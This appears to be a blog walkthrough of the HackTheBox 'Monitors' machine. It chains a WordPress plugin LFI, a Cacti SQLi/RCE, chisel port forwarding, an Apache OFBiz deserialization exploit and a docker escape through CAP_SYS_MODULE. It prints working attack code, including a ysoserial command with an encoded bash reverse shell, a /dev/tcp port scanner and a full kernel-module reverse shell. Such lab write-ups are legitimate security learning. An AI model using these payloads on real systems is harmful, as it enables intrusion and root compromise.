HackTheBox - Monitors

This box is one of my favourite one as it contains a lot of CVE related vulnerabilities. CVE means that it is related to Real World vulnerabilities. So let's get started.

Nmap scan results

nmap -A -T4 -p- -oA nmap-allport 10.10.10.238

Its always good to scan all the ports. I will be adding monitors.htb to /etc/hosts file.

Enumerating Wordpress

I will be using wpscan tool which can help us identify potential vulnerable plugins and probable users.

wpscan --url http://monitors.htb/ --enumerate u,vp

The tool didn't gave us any vulnerable plugins, so I will manually try to browse the plugin directory. The directory is located at /wp-content/plugins/

WP Spritz Plugin (Vulnerable to LFI)

We can FUZZ the url parameter from this wordlist over here or we can try to manually FUZZ it. First thing to look for is Apache log poisoining followed by old school tricks. That didn't gave us anything. So next thing to look for is apache2.conf file. Also another thing to look for is wp-config.php which might contain potential usernames and passwords.

Discovering cacti-admin.monitors.htb (Virtual host)

There's also virtual hosting present. We can add cacti-admin.monitors.htb into our /etc/hosts file.

We have credentials, maybe we can try default usernames like admin, administrator, guest, etc. I tried admin : BestAdministrator@2020! and got access to it. (Lucky af)

Exploiting Cacti (SQLi/ Remote Code Execution)

The version of cacti used is 1.2.12. So let's search for any known vulnerabilities on google.

Read what the misconfiguration is and download the exploit. We need to provide credentials to exploit this vulnerability.

Docker Enumeration (Scanning for hosts)

After getting the shell, I got stuck for a very long time. Then I decided to proceed with docker enumeration. (I checked it using ifconfig command)

So to search for other hosts present on docker interface, I grabbed the static nmap binary from my machine using netcat. (As curl and wget not installed on the system)

Now we can use nmap to scan for ports as well but I like this script which is comparitively fast and easy.

#!/bin/bash

ip=$1

if [[ $# -eq 0 ]];then
        echo "[-] Supply IP Address"
        exit 0
fi

for i in `seq 1 65535`;do
        echo 1 > /dev/tcp/$ip/$i
        if [[ $? -eq 0 ]];then
                echo "[+] Port open: $i"
        fi
done

Forwarding the ports to our local machine using chisel

Now I will be forwarding these ports to my local machine using chisel. You can get chisel from here.

./chisel server --reverse -p 9002 (My local machine)
./chisel client 10.10.14.44:9002 R:8443:127.0.0.1:8443 & (Remote machine)
./chisel client 10.10.14.44:9002 R:8081:127.0.0.1:8080 & (Remote machine)

So apache ofbiz is running on port 8443, we can check that by going to https://127.0.0.1:8443/catalog

Apache OFBiz is an open source enterprise resource planning system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. OFBiz is an Apache Software Foundation top level project.

Exploiting Apache OFBiz XMLRPC Deserialization (RCE)

We can look for known vulnerabilities out there on google. The version we are running is 17.12.01. Got using ps aux (which lists the running processes)

This one looks satisfying. To exploit this vulnerability, we need to send malicious serialized data to /webtools/control/xmlrpc.

Intercept the request in Burp and change the request method to POST. Also change the Content-Type header to application/xml

<?xml version="1.0"?>
<methodCall>
    <methodName>
        ProjectDiscovery
    </methodName>
    <params>
    <param>
        <value>
            <struct>
                <member>
                    <name>
                        test
                    </name>
                        <value>
                            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
                                [Malicious Serialized Data]
                            </serializable>
                        </value>
                </member>
            </struct>
        </value>
    </param>
    </params>
</methodCall>

Now to generate the serialized data, I will be using ysoserial.jar. Download the jar file from here. Use this website to generate reverse shell payloads for Java deserialization.

java -jar ysoserial.jar CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}' | base64 -w 0

Copy the payload and paste it in Burp. Make sure you are listening on port you specified.

Escaping docker using SYS_MODULE Capability

Now if you will check the capabilities, we have cap_sys_module.(Check it using capsh --print)

The CAP_SYS_MODULE capability allows loading modules from anywhere, rather than restricting the module search path to /lib/modules/..

We can exploit this to get root access on host machine. The above article explains it very well.

// Reverse shell - I named it to be shell.c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

// Makefile 
obj-m +=shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Now we need to listen on port 4444 before we insert this module.

And now insert the module using insmod command.

PreviousHackTheBox - Obscurity

Last updated 3 years ago

Was this helpful?